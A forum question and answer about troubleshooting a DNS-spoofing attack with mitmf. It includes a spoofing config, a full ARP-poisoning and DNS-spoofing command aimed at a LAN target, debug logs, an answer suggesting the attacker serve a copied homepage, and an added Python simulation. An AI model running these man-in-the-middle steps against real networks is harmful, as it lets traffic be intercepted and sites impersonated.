Trying to DNS spoof using mitmf


I am trying to redirect a page from taulukko.com to google.com for learning purposes, but without success.

When I access taulukko.com from the spoofed node I get:

The webpage cannot be found

my mitmf.conf:

#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
#can also be a comma separated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8

[[[A]]]     # Queries for IPv4 address records
#*.thesprawls.org=192.0.2.1
*.taulukko.com=201.55.233.116

[[[AAAA]]]  # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1

[[[MX]]]    # Queries for mail server records
*.thesprawl.org=mail.fake.com

[[[NS]]]    # Queries for name server records
*.thesprawl.org=ns.fake.com

[[[CNAME]]] # Queries for alias records
*.thesprawl.org=www.fake.com

[[[TXT]]]   # Queries for text records
*.thesprawl.org=fake message

[[[PTR]]]   # PTR queries
*.2.0.192.in-addr.arpa=fake.com

[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600

[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:[email protected]! .

[[[SRV]]] #FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com

the command:

mitmf -i wlan0 --spoof --arp --dns --gateway 192.168.0.1 --target 192.168.0.16 --log debug

the debug output:

2016-02-20 18:05:47 [Utils] Setting iptables DNS redirection rule from port 53 to 53
2016-02-20 18:05:47 [Utils] Setting ip forwarding to 1
2016-02-20 18:05:47 [Utils] Flushing iptables
2016-02-20 18:05:47 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2016-02-20 18:05:47 [ARPpoisoner] gatewayip  => 192.168.0.1
2016-02-20 18:05:47 [ARPpoisoner] gatewaymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] targets    => ['192.168.0.16']
2016-02-20 18:05:47 [ARPpoisoner] targetmac  => None
2016-02-20 18:05:47 [ARPpoisoner] mymac      => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] interface  => wlan0
2016-02-20 18:05:47 [ARPpoisoner] arpmode    => rep
2016-02-20 18:05:47 [ARPpoisoner] interval   => 3
2016-02-20 18:05:47 [ProxyPlugins] Adding Spoof plugin
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:47 [SMBserver] Callback added for UUID X-X-X-X-X V:3.0
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:49 [ClientRequest] Resolving host: www.taulukko.com
2016-02-20 18:05:49 [ClientRequest] Host not cached.
2016-02-20 18:05:49 [ClientRequest] Resolving with DNSChef
2016-02-20 18:05:49 [ClientRequest] Resolved host successfully: www.taulukko.com -> 201.55.233.116
2016-02-20 18:05:49 [ClientRequest] Zapped encoding
2016-02-20 18:05:49 [ClientRequest] Sending request via HTTP
2016-02-20 18:05:49 [ServerConnection] HTTP connection made.
2016-02-20 18:05:49 [ProxyPlugins] hooking connectionMade()
2016-02-20 18:05:49 192.168.0.16 [type:IE 8.0 os:Windows 7] Sending Request: www.taulukko.com
2016-02-20 18:05:49 [ServerConnection] Full request: www.taulukko.com/
2016-02-20 18:05:49 [ServerConnection] Sending header: (host: www.taulukko.com)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept-language: en-US)
2016-02-20 18:05:49 [ServerConnection] Sending header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*)
2016-02-20 18:05:49 [ServerConnection] Sending header: (user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0))
2016-02-20 18:05:49 [ServerConnection] Server response: HTTP/1.0 404 Not Found
2016-02-20 18:05:49 [ProxyPlugins] hooking handleEndHeaders()
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-xss-protection: 1; mode=block)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (server: HTTP server (unknown))
2016-02-20 18:05:49 [ServerConnection] Receiving header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (date: Sat, 20 Feb 2016 20:05:49 GMT)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (content-type: text/html)
2016-02-20 18:05:49 [ProxyPlugins] hooking handleResponse()
2016-02-20 18:05:49 [ServerConnection] Read from server 49 bytes of data
2016-02-20 18:05:54 [ARPpoisoner] Restoring connection 192.168.0.16 <-> 192.168.0.1 with 2 packets per host
2016-02-20 18:05:54 [Utils] Flushing iptables
2016-02-20 18:05:54 [Utils] Setting ip forwarding to 0
posted by gui_cc2015 20.02.2016 - 21:17

1 answer

DNS spoofing is not redirection.

In this case, in the MITM setup, whenever the victim does not know the IP of taulukko.com it sends a DNS query, and in return it gets the corresponding IP from the DNS server.

With dnsspoof, the attacker floods the victim with his own crafted DNS reply.

So now, whenever the victim asks for taulukko's IP, it receives the crafted DNS replies.

Example: the attacker dnsspoofs taulukko's IP to Google's IP.

The attacker's DNS replies say that the IP address of taulukko.com is (Google's IP). So now the victim asks Google's IP for the taulukko.com web page.

Which is not present there (check the HTTP header). So you don't get the web page.

Solution: DNS-spoof taulukko.com to your own IP and run your own server with taulukko's homepage. The victim gets your page, not taulukko's original homepage. (Check the packets in Wireshark to verify everything) :-)

Good link for dnsspoof

answered 21.02.2016 - 08:22
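The mechanism the answer describes, modelled as an added example (not code from the question, the answer or mitmf): a spoofed A record sends the victim's request to a server that does name-based virtual hosting, and that server answers 404 because it serves no site called www.taulukko.com; pointing the record at a server that does host that name yields 200. The vhost tables, the hypothetical 192.168.0.20 server and the one-label `*` wildcard semantics are assumptions for the illustration, not facts from the page.

```python
import itertools

# Constructed spoof table: the [[[A]]] entry from the question's mitmf.conf.
SPOOFED_A = {"*.taulukko.com": "201.55.233.116"}

# Constructed: the hostnames each web server actually answers for
# (name-based virtual hosting). Which sites 201.55.233.116 serves is an
# assumption for the illustration; 192.168.0.20 is a hypothetical server
# of your own that serves a copy of the page, as the answer suggests.
VHOSTS = {
    "201.55.233.116": {"www.google.com", "google.com"},
    "192.168.0.20": {"www.taulukko.com"},
}


def spoofed_lookup(qname, table=SPOOFED_A):
    """Resolve qname against the spoof table. Labels are compared right to
    left and '*' matches exactly one label (simplified wildcard semantics,
    an assumption; check your tool's own matching rules for the apex name)."""
    qlabels = qname.lower().rstrip(".").split(".")[::-1]
    for pattern, ip in table.items():
        plabels = pattern.lower().split(".")[::-1]
        if len(qlabels) != len(plabels):
            continue
        if all(p == "*" or p == q for q, p in zip(qlabels, plabels)):
            return ip
    return None


def http_get(ip, host_header, vhosts=VHOSTS):
    """Server side: a vhost server picks the site from the Host header and
    answers 404 Not Found when it hosts nothing by that name."""
    served = vhosts.get(ip, set())
    if host_header.lower() in served:
        return 200, "page for " + host_header
    return 404, "Not Found"


def fetch(hostname, table=SPOOFED_A, vhosts=VHOSTS):
    """Victim's view: DNS answer taken from the spoof table, then an HTTP
    request to that IP carrying 'Host: <hostname>'. Returns (ip, status)."""
    ip = spoofed_lookup(hostname, table)
    if ip is None:
        return None, None
    status, _body = http_get(ip, hostname, vhosts)
    return ip, status


if __name__ == "__main__":
    print(fetch("www.taulukko.com"))                                   # the question's 404
    print(fetch("www.taulukko.com", {"*.taulukko.com": "192.168.0.20"}))  # the answer's fix
```

The first call reproduces the log in the question (resolved to 201.55.233.116, then HTTP 404); the second shows the answer's fix, where the spoofed record points at a server that serves the name.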